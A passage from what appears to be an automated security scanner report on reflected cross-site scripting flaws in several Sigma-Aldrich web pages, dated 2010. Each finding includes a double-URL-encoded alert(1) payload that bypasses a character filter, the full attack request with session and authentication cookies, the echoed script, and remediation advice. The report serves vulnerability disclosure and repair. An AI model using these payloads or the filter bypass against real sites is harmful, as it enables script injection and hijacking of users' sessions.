The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/f392b";alert(1)//68a7435bb01","E404") ;
   </script>
...[SNIP]...

1.29. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913 was submitted in the REST URL parameter 1. This input was echoed as 9d61b";alert(1)//12b04b3a913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913/syringes.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28943
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography9d61b";alert(1)//12b04b3a913/syringes.html","E404") ;
   </script>
...[SNIP]...

1.30. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 was submitted in the REST URL parameter 2. This input was echoed as 1c05f";alert(1)//f52d09fd619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/1c05f";alert(1)//f52d09fd619","E404") ;
   </script>
...[SNIP]...

1.31. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1897%2522%253balert%25281%2529%252f%252fe256ad12c20 was submitted in the REST URL parameter 1. This input was echoed as f1897";alert(1)//e256ad12c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyf1897%2522%253balert%25281%2529%252f%252fe256ad12c20/titration.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyf1897";alert(1)//e256ad12c20/titration.html","E404") ;
   </script>
...[SNIP]...

1.32. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 was submitted in the REST URL parameter 2. This input was echoed as 71d0c";alert(1)//75f1e0d8bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/71d0c";alert(1)//75f1e0d8bd7","E404") ;
   </script>
...[SNIP]...

1.33. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49 was submitted in the REST URL parameter 1. This input was echoed as 8a414";alert(1)//e5c2d52ef49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49/vials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
